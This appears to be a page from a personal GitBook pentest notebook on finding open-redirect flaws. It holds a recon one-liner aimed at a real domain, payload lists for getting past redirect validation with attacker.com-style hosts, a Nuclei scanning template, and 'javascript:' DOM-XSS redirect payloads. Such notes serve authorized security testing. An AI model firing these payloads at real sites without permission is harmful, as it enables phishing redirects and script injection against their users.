0xSs0rZ
  • Hello World
  • Whoami
  • Pentest
    • Recon
      • Tools
      • Information Gathering
      • OSINT
        • Tools
        • Emails
        • Dark Web Exposure
        • Database Leak - Credential stuffing
        • Code Search (Gitlab / Github)
        • Credentials in git repos
        • GitHub - finding vulnerabilities
        • API Leaks
        • Social Media
        • Credentials in YouTube Videos
        • Metadata and Hidden infos
      • Whois
      • Google Dorks
      • Git Dorks
      • Cloud
      • DNS Subdomain Enumeration
      • Virtual Host
      • Fingerprinting / Crawling
      • Host Discovery
    • Protocols
      • Port Scan
      • IDS IPS AV Evasion
      • Common Ports
      • MindMap
      • DNS (53)
      • FTP (21)
      • IMAP POP3 (110, 143, 993, 995)
      • IPMI (623 UDP)
      • Kerberos (88)
      • LDAP (389)
      • MSSQL (1433)
      • MySQL (3306)
      • NFS (2049, 111)
      • Oracle TNS (1521, 1522-1529, 1748)
      • RDP (3389)
      • R-Services (512,513,514)
      • RSYNC (873)
      • SMB (445, 139) / RPC
      • SMTP (25, 465)
      • SNMP (10161, UDP 161)
      • SQLite
      • SSH (22)
      • WinRM (5985, 5986)
      • WMI (135)
    • Brute force
      • Default Credentials
      • Password lists
      • Username lists
      • Kraken - All-in-One Tool
      • Bypass IP Blocking
      • Hydra - Basics
      • Web login
      • FTP Bruteforce
      • O365 Bruteforce
      • POP3 Bruteforce
      • RDP Bruteforce
      • SMB Bruteforce
      • SMTP Bruteforce
      • SSH Bruteforce
      • WinRM Bruteforce
    • Shells
      • Web Shell
      • Bind and Reverse Shell
      • TTY Upgrade
    • File Transfer
      • Upload
      • Download - Exfiltration
      • Encryption
    • Web attacks
      • Methodology & Academy
      • OWASP Top 10
      • Avoid Aggressive Scanning
      • Web Enumeration
      • Fuzzing
      • Bypass 403 / 401
      • Registration Form
      • Email Verification Bypass
      • Email injections
      • Phone Number Injection
      • Login Forms Attacks
        • Bypass Authentication
        • Login Brute Force
        • Stay Logged In
        • PHP Type Juggling
      • Bypass Captcha
      • OAuth Misconfiguration
      • 2FA / OTP
      • Bypass 302
      • Password Reset
      • SQL Injection
      • NoSQL injection
      • LDAP Injection
      • XSS
      • SSI / ESI Injection
      • CSP Bypass
      • File Inclusion LFI / RFI
      • File Upload Attacks
      • Command Injection
      • Markdown injection
      • XPath Injection
      • HTTP Verb Tampering
      • HTTP Header Exploitation
      • HTTP Request Smuggling
      • Price / Checkout Manipulation Methods
      • Testing Credit Cards
      • Cookies Misconfiguration
      • Basic HTTP Authentification
      • JWT Token
      • IDOR
      • XXE / XSLT
      • SSTI
      • CSTI
      • SSRF
      • CSRF
      • CORS
      • Open Redirection
      • CSPT
      • Relative Path Overwrite, RPO
      • CRLF Injection
      • JSON Attack
      • Prototype Pollution
      • Web Mass Assignment
      • Web Cache
      • Clickjacking
      • Tabnabbing
      • Race Conditons
      • WAF Bypass
      • CMS
      • Django
      • Flask / Werkzeug
      • Tomcat (8080)
      • Tomcat CGI
      • Nginx
      • IIS
      • Exchange / OWA
      • GitLab
      • Jenkins
      • Splunk
      • Elasticsearch
      • PRTG Network Monitor
      • osTicket
      • ColdFusion
      • Nagios
      • Webmin
      • Slack
      • Moodle
      • Jira
      • Magento
      • Prestashop
      • Docker
    • API
      • OWASP API Top 10
      • Checklist
      • API Discovery / Reco
      • Sensitive Data (API Key, JWT token, etc.) Exposed
      • Postman Usage
      • ZAP Scanner
      • Swagger UI
      • REST API
      • Improper Asset Management
      • Email Enumeration
      • Authentication Bruteforce
      • JWT Token
      • Insecure UUID
      • Mass Assignment
      • Server Side Parameter Pollution
      • IDOR
      • JSON Injection
      • GraphQL
      • Tools & Scanners
      • Resources
    • Public Exploit
      • Search for CVE PoC
      • Convert line breaks from DOS to Linux
      • 7 zip
      • Adobe Acrobate Reader
      • Aiohttp
      • Angular
      • AnyDesk
      • Apache Active MQ
      • Apache Camel
      • Apache OFBiz
      • Apache Struts
      • Apache Traffic Control
      • Axis IP Camera
      • Cacti
      • Chamilo elearning
      • Check Point
      • Cisco
      • Citrix
      • Cleo File Transfer
      • CyberPanel
      • D-Link
      • F5 Big-IP
      • Froxlor
      • Fortinet
      • GeoServer
      • Ghostscript
      • Gitea
      • GLPI
      • Gogs
      • Grafana
      • Ivanti
      • Keycloak
      • Laravel
      • Mitel MiCollab
      • MobileIron
      • MOVEit Transfer
      • Navidrome
      • Next.js
      • Node.js
      • Nostromo
      • NVMS 1000
      • OpenNetAdmin
      • Oracle Weblogic
      • Palo Alto
      • Pandora
      • PDF.js
      • pfSense
      • PHP
      • phpMyAdmin
      • Prestashop
      • Roundcube
      • rsync
      • SolarWinds
      • Spring Framework
      • SQLPad
      • Squid Proxy
      • SuiteCRM
      • Symfony
      • TeamViewer
      • TP Link
      • VMWare
      • Wazuh
      • Winrar
      • Zabbix
      • Zimbra
      • ZoneAlarm AV/Firewall
      • ZoneMinder
    • External Pentest
    • Internal Pentest
      • Tools
      • Methodology & Cheatsheet
      • Basic Windows Commands
      • Network Attacks
      • LLMNR NBT-NS Poisoning
      • ADIDNS Spoofing
      • TimeRoast
      • Users Identification
      • Password Policy
      • Password Spray
      • LDAP Pass Back Attack
      • Reconaissance
        • Bloodhound
        • Enumeration from Windows Host
        • Enumeration from Linux Host
      • Microsoft Office & Outlook
      • Microsoft SharePoint
      • Windows Exploit
      • Print Spooler
      • LOL Bins
      • Security Controls
      • Network Shares
      • RDWA
      • Kerberoast
      • Misconfiguration
      • Pre-Created Computer Accounts
      • Privileged Access
      • ACL
      • Privilege escalation
      • SAM & LSA secrets
      • NTLM Hashes
      • LSASS secrets
      • AD CS
      • DPAPI
      • gMSA
      • Bypass Powershell Execution Policy
      • Disable / Remove AV Defender and Firewall
      • Kerberos Double Hop Problem
      • SCCM
      • AD FS
      • Trustee and Resource Delegation
      • LAPS
      • DCSync
      • NTDS secrets
      • Domain Password Audit Tools
      • Trusts
      • Persistence
      • Tiering
      • Detection
    • Privilege Escalation
      • Find specific file
      • Linux
        • Tools
        • Linux PrivEsc MindMap
        • Basics Commands
        • Basics - EoP Checklist
        • Environment Enum
        • Services & Internals Enum
        • Writable files / directories
        • /etc/passwd & /etc/shadow
        • Credentials Hunting
        • Path Abuse
        • Wildcard Abuse
        • Escaping Restricted Shells
        • SUID/SGID
        • Sudo Rights Abuse
        • Privileged Groups
        • Capabilities
        • Vulnerable Services
        • Cron Job Abuse
        • Kubernetes
        • Logrotate
        • Miscellaneous Techniques
        • Kernel Exploits
        • Shared Libraries
        • Shared Object Hijacking
        • Python Library Hijacking
        • su bruteforce
        • Hardening Linux
      • Windows
        • Tools
        • Cheatsheet
        • Enumeration
        • Credentials Hunting
        • User Privileges
        • Group Privileges
        • User Account control (UAC)
        • Weak Permissions
        • Kernel / Drivers Exploits
        • Vulnerable Services
        • Exploit CVE
        • DLL Hijacking
        • Citrix Breakout
        • RDWeb Breakout
        • Interacting with Users
        • Pillaging
        • Miscellaneous Techniques
        • Windows Server
        • Windows Desktop Versions
        • Windows Processes
        • MSI Files
        • NTLM elevation of privilege
        • From Local Admin to NT AUTHORITY\SYSTEM
      • Docker Escape / Breakout
    • Post Exploitation
      • Pivot, Tunneling and Port Forwarding
      • Lateral Movement
        • Pass the Hash (PtH)
        • Pass the Ticket (PtT) - Windows
        • Pass the Ticket (PtT) - Linux
        • Fileless Lateral Movement
        • DCOM
      • Gather credentials and more
        • Credentials on Host
        • Password managers, Teamviewer, Outlook, etc.
        • Microsoft Teams Cookies
        • Browser cookies
        • Linux post exploitation
        • Screenshots, clipboard
        • IIS Credentials
        • Azure AD / Entra ID
        • MSOL (Microsoft Online Services) account
        • SCOM credentials
        • Cisco phone system
      • Exfiltration
      • Resources
    • Cracking
      • Hashes
      • Files - Encrypted
      • Blurred image, pdf, etc
    • Thick Client Pentest
    • Wifi Pentest
    • Mobile Pentest
    • Configuration Audit
    • Code Analysis
    • Tools
      • Arsenal - Cheatsheet
      • Burp
      • Browser Extensions
      • Evil-WinRM
      • Internal Pentest Tools Pre Compiled
      • Metasploit
      • Mimikatz
      • NetExec - CME
      • PowerView
      • Rubeus
      • SQLMAP
      • Vulnerability Scanners
      • Collaborator, Web Hook, etc.
    • Search Engines
    • Cheatsheets
    • Note Keeping / Reporting / Admin Stuff
  • Cloud
    • Cloud VM
    • Enumeration
    • SSRF / RCE
    • Azure
    • AWS
    • GCP
    • Kubernetes
    • Tools
  • Antivirus Evasion - Defender
    • Mindmap
    • Defender Module for PowerShell
    • Static Analysis
    • Dynamic Analysis
    • AMSI Bypass
    • Process Injection
    • Open-Source Software
    • User Access Control (UAC)
    • AppLocker
    • LOLBAS / LOLDrivers / LOLESXi
    • PowerShell ConstrainedLanguage Mode, CLM
    • VBScript
    • Bypass all Powershell security features (AMSI,CLM)
    • Bypass AV Payload / Shells
    • Find Folder Exclusions
    • Resources
  • EDR BYPASS
    • Approches for Evasion
    • Tools
    • Obfuscation
    • EDR Killer
    • BYOVD
    • Spoof Command Line Arguments
    • Blind Spots
    • Living Off Security Tools / LOTTunels
    • Process Hollowing
    • Process Injection - Reverse Shell
    • Payload Creation
    • Shellcode Loader
    • MalDev
    • Malware Testing Lab
    • Resources
  • Red Team
    • OpSec / Anonymity
    • Initial Access
    • Infrastructure (phishing, C2, redirector)
    • C2
    • EDR / AV Bypass
    • Physical Penetration Testing
    • Resources
  • CTF
    • OSINT
    • Forensic
      • PCAP Analysis - Wireshark
      • DNS
      • Active Directory - GPO
      • Rubber Ducky
      • Memory Analysis
      • Disk Analysis
      • Extract Data / File Carving
      • Metadata
      • BinWalk
      • Audio
      • PNG Images
    • Cryptography
      • Tools
      • GPG
      • RSA
      • ECB / CBC
      • Esoteric Programming Language
      • One Time Pad
      • Baconian Cipher
      • ROT-13 / Caesar
      • Morse Code
      • XOR
      • Substitution
      • Vigenere
    • Steganography
      • Methods
      • Tools
Powered by GitBook
On this page
  • One-Liner
  • Payloads
  • Parameter Pollution
  • Creating folder as victim domain
  • Nuclei Template
  • DOM Based redirect - XSS
  • URL Validation Bypass
  • Tools
  • Resources

Was this helpful?

  1. Pentest
  2. Web attacks

Open Redirection

PreviousCORSNextCSPT

Last updated 24 days ago

Was this helpful?

You should be looking for open URL redirects in the following areas of your target:

  • Sign in & register pages

  • Sign out application route or API endpoint

  • Password resets (inspect the generated token link too as it may contain a redirect parameter)

  • Profile account page

  • Email verification links

  • Error pages

  • Any important action within the app that requires multiple steps

One-Liner

echo "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew

Payloads

https://evil.com - ❌
https:evil.com ✅
# Bypass a HTTP scheme blacklist
//attacker.com
/%0A/attacker.com
/%0D/attacker.com
/%09/attacker.com
/+/attacker.com
///attacker.com
\\attacker.com
\/\/attacker.com/
/\/attacker.com/
//attacker%00.com

# Bypass a URI authority component (//) blacklist
http:example.com
https:example.com

# Bypass weak domain validation
https://example.com@attacker.com
https://example.com.attacker.com
https://attacker.com/example.com
https://attacker.com?example.com
https://web-attacker.com?https://example.com
https://attacker.com%23example.com
https://attacker.com%00example.com
https://attacker.com%0Aexample.com
https://attacker.com%0Dexample.com
https://attacker.com%09example.com
https://example.com°attacker.com
target.com%40attacker.com
target.com?attacker.com

# Bypass weak top-level domain (TLD) validation
https://example.comattacker.com
https://example.com.mx
https://example.company                                  # .company is a valid TLD
https://attacker.com%E3%80%82example.com                 # URL encoded Chinese dot
attacker%E3%80%82com
/%09/google.com
/%5cgoogle.com
//www.google.com/%2f%2e%2e
//www.google.com/%2e%2e
//google.com/
//google.com/%2f..
//\google.com
/\vicitm.om:80%40google.com
//www.whitelisteddomain.tld@google.com/%2f..
///google.com/%2f..
///www.whitelisteddomain.tld@google.com/%2f..
////google.com/%2f..
////www.whitelisteddomain.tld@google.com/%2f..
https://google.com/%2f..
https://www.whitelisteddomain.tld@google.com/%2f..
/https://google.com/%2f..
/https://www.whitelisteddomain.tld@google.com/%2f..
//www.google.com/%2f%2e%2e
//www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
///www.google.com/%2f%2e%2e
///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
////www.google.com/%2f%2e%2e
////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
//google.com/

Parameter Pollution

/?next=target.com&next=evil.com

Creating folder as victim domain

http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com

Nuclei Template

https://github.com/coffinxp/priv8-Nuclei/blob/main/mass_48_open_redirect_check.yaml

id: mass_48_open_redirect_check
info:
  name: Mass 48 Param For Open Redirect
  author: SirBugs
  severity: medium
requests:
  - method: GET
    path:
      - "{{BaseURL}}/https://bing.com/"
      - "{{BaseURL}}//https://bing.com//"
      - "{{BaseURL}}/?targetOrigin=https://bing.com/"
      - "{{BaseURL}}/?fallback=https://bing.com/"
      - "{{BaseURL}}/?query=https://bing.com/"
      - "{{BaseURL}}/?redirection_url=https://bing.com/"
      - "{{BaseURL}}/?next=https://bing.com/"
      - "{{BaseURL}}/?ref_url=https://bing.com/"
      - "{{BaseURL}}/?state=https://bing.com/"
      - "{{BaseURL}}/?1=https://bing.com/"
      - "{{BaseURL}}/?redirect_uri=https://bing.com/"
      - "{{BaseURL}}/?forum_reg=https://bing.com/"
      - "{{BaseURL}}/?return_to=https://bing.com/"
      - "{{BaseURL}}/?redirect_url=https://bing.com/"
      - "{{BaseURL}}/?return_url=https://bing.com/"
      - "{{BaseURL}}/?host=https://bing.com/"
      - "{{BaseURL}}/?url=https://bing.com/"
      - "{{BaseURL}}/?redirectto=https://bing.com/"
      - "{{BaseURL}}/?return=https://bing.com/"
      - "{{BaseURL}}/?prejoin_data=https://bing.com/"
      - "{{BaseURL}}/?callback_url=https://bing.com/"
      - "{{BaseURL}}/?path=https://bing.com/"
      - "{{BaseURL}}/?authorize_callback=https://bing.com/"
      - "{{BaseURL}}/?email=https://bing.com/"
      - "{{BaseURL}}/?origin=https://bing.com/"
      - "{{BaseURL}}/?continue=https://bing.com/"
      - "{{BaseURL}}/?domain_name=https://bing.com/"
      - "{{BaseURL}}/?redir=https://bing.com/"
      - "{{BaseURL}}/?wp_http_referer=https://bing.com/"
      - "{{BaseURL}}/?endpoint=https://bing.com/"
      - "{{BaseURL}}/?shop=https://bing.com/"
      - "{{BaseURL}}/?qpt_question_url=https://bing.com/"
      - "{{BaseURL}}/?checkout_url=https://bing.com/"
      - "{{BaseURL}}/?ref_url=https://bing.com/"
      - "{{BaseURL}}/?redirect_to=https://bing.com/"
      - "{{BaseURL}}/?succUrl=https://bing.com/"
      - "{{BaseURL}}/?file=https://bing.com/"
      - "{{BaseURL}}/?link=https://bing.com/"
      - "{{BaseURL}}/?referrer=https://bing.com/"
      - "{{BaseURL}}/?recipient=https://bing.com/"
      - "{{BaseURL}}/?redirect=https://bing.com/"
      - "{{BaseURL}}/?u=https://bing.com/"
      - "{{BaseURL}}/?hostname=https://bing.com/"
      - "{{BaseURL}}/?returnTo=https://bing.com/"
      - "{{BaseURL}}/?return_path=https://bing.com/"
      - "{{BaseURL}}/?image=https://bing.com/"
      - "{{BaseURL}}/?requestTokenAndRedirect=https://bing.com/"
      - "{{BaseURL}}/?retURL=https://bing.com/"
      - "{{BaseURL}}/?next_url=https://bing.com/"
    redirects: false
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "Location: https://bing.com"
      - type: status
        status:
          - 301
          - 302
          - 303
          - 304
          - 307
          - 308

DOM Based redirect - XSS

GET /signin?redirectURL=javascript:alert() HTTP/1.1
Host: example.com
# Simple bypasses
javascript:alert(1)
JavaScript:alert(1)
JAVASCRIPT:alert(1)
javascript:alert(1);//#

# Bypass weak regex patterns (try repositioning the URL-encoded special characters)
ja%20vascri%20pt:alert(1)
jav%0Aascri%0Apt:alert(1)
jav%0Dascri%0Dpt:alert(1)
jav%09ascri%09pt:alert(1)

# More advanced weak regex pattern bypasses
%19javascript:alert(1)
javascript://%0Aalert(1)
javascript://%0Dalert(1)
javascript://https://example.com%0Aalert(1)

URL Validation Bypass

Tools

Resources

XSS
LogoGitHub - payloadbox/open-redirect-payload-list: 🎯 Open Redirect Payload ListGitHub
LogoBug-Bounty-Methodology/Open Redirect.md at main · trilokdhaked/Bug-Bounty-MethodologyGitHub
LogoURL validation bypass cheat sheet for SSRF/CORS/Redirect - 2024 Edition | Web Security AcademyWebSecAcademy
LogoGitHub - r0075h3ll/Oralyzer: Open Redirection AnalyzerGitHub
LogoGitHub - cujanovic/Open-Redirect-Payloads: Open Redirect PayloadsGitHub
LogoGitHub - KariiemGamal/0dSSRF: a powerful tool designed to automate the detection of Server-Side Request Forgery (SSRF) and Open Redirect vulnerabilitiesGitHub
LogoOpen redirection (reflected)
LogoOpen redirect vulnerability | Tutorials & examples | Snyk LearnSnyk Learn
LogoUnvalidated Redirects and Forwards - OWASP Cheat Sheet Series
LogoOpen RedirectIntigriti
LogoOpen URL redirects: A complete guide to exploiting open URL redirect vulnerabilitiesIntigriti